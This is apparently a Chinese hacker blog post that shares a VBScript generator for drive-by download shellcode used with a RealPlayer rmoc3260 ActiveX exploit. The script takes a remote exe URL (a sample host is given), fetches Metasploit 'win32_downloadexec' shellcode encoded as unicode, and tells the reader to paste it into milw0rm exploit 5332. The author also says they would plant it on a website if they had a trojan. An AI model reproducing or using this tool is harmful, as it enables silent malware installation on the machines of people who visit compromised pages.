milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。

http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar


以下原vbs文件:
'以下代码保存成vbs,双击即可

On Error Resume Next
Exeurl 
= InputBox"请输入exe的地址:""输入""http://www.haiyangtop.net/333.exe" )
url 
= "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
Body 
= getHTTPPage(url)
Set Re = New RegExp
Re.Pattern 
= "(\$shellcode \=[\s\S]+</div></pre>)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code
=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

function replaceregex(str)
set regex=new regExp
regex.pattern
="\\x(..)\\x(..)"
regex.IgnoreCase
=true
regex.global
=true
matches
=regex.replace(str,"%u$2$1")
replaceregex
=matches
end Function

Function getHTTPPage(Path)
 t 
= GetBody(Path)
 getHTTPPage 
= BytesToBstr(t, "GB2312")
End Function

Function GetBody(url)
 
On Error Resume Next
 
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
 
With Retrieval
 .Open 
"Get", url, False""""
 .Send
 GetBody 
= .ResponseBody
 
End With
 
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
 
Dim objstream
 
Set objstream = CreateObject("adodb.stream")
 objstream.Type 
= 1
 objstream.Mode 
= 3
 objstream.Open
 objstream.Write Body
 objstream.Position 
= 0
 objstream.Type 
= 2
 objstream.Charset 
= Cset
 BytesToBstr 
= objstream.ReadText
 objstream.Close
 
Set objstream = Nothing
End Function

Function URLEncoding(vstrIn)
 strReturn 
= ""
 
For aaaa = 1 To Len(vstrIn)
 ThisChr 
= Mid(vStrIn,aaaa,1)
 
If Abs(Asc(ThisChr)) < &HFF Then
 strReturn 
= strReturn & ThisChr
 
Else
 innerCode 
= Asc(ThisChr)
 
If innerCode < 0 Then
 innerCode 
= innerCode + &H10000
 
End If
 Hight8 
= (innerCode And &HFF00)\ &HFF
 Low8 
= innerCode And &HFF
 strReturn 
= strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
 
End If
 
Next
 URLEncoding 
= strReturn
End Function

set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",8,true)
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set fso=Nothing
wscript.echo 
Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可"